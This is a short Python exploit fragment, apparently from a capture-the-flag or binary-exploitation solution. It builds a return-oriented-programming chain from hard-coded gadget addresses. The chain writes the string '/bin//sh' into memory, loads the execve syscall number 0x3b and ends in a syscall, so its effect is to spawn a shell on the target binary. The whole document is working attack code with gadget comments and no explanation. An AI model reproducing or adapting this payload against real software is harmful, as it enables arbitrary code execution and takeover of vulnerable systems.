payload = p64(0x42e512)
#0x000000000042e512: pop rcx; ret; 
payload += p64(0x6e69622f)+p64(0x41d62b)
# 0x000000000041d62b: xchg ecx, eax; ret 3; 
payload += p64(0x42e512)+"\x00"*3
# 0x000000000042e512: pop rcx; ret; 
payload += p64(0x460049)+p64(0x44de58)
# 0x44de58: or dword ptr [rcx + 0xf], eax ; ret
payload += p64(0x42e512)
# 0x000000000042e512: pop rcx; ret; 
payload += p64(0x68662f)+p64(0x41d62b)
# 0x000000000041d62b: xchg ecx, eax; ret 3; 
payload += p64(0x42e512)+"\x00"*3
# 0x000000000042e512: pop rcx; ret; 
payload += p64(0x46004d)+p64(0x44de58)
# 0x44de58: or dword ptr [rcx + 0xf], eax ; ret
payload += p64(0x40a810)
# 0x40a810: pop rsi ; or al, 7 ; or dh, al ; retf
payload += p64(0x0)+p32(0x406abc)+p32(0x33)
# 0x0000000000406abc: pop rdi; test al, 0x86; fimul dword ptr [rax - 0x1414017]; ret; 
payload += p64(0x460058)+p64(0x42e512)
# 0x000000000042e512: pop rcx; ret; 
payload += p64(0x0)+p64(0x41d62b)
# 0x000000000041d62b: xchg ecx, eax; ret 3; 
payload += p64(0x44adcb)+"\x00"*3
# 0x000000000044adcb: xchg edx, eax; ret 0x148; 
payload += p64(0x42e512)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)
# 0x000000000042e512: pop rcx; ret; 
payload += p64(0x3b)+p64(0x41d62b)
# 0x000000000041d62b: xchg ecx, eax; ret 3; 
payload += p64(0x40f7c5)+"\x00"*3
# 0x000000000040f7c5: syscall; 
payload += b''
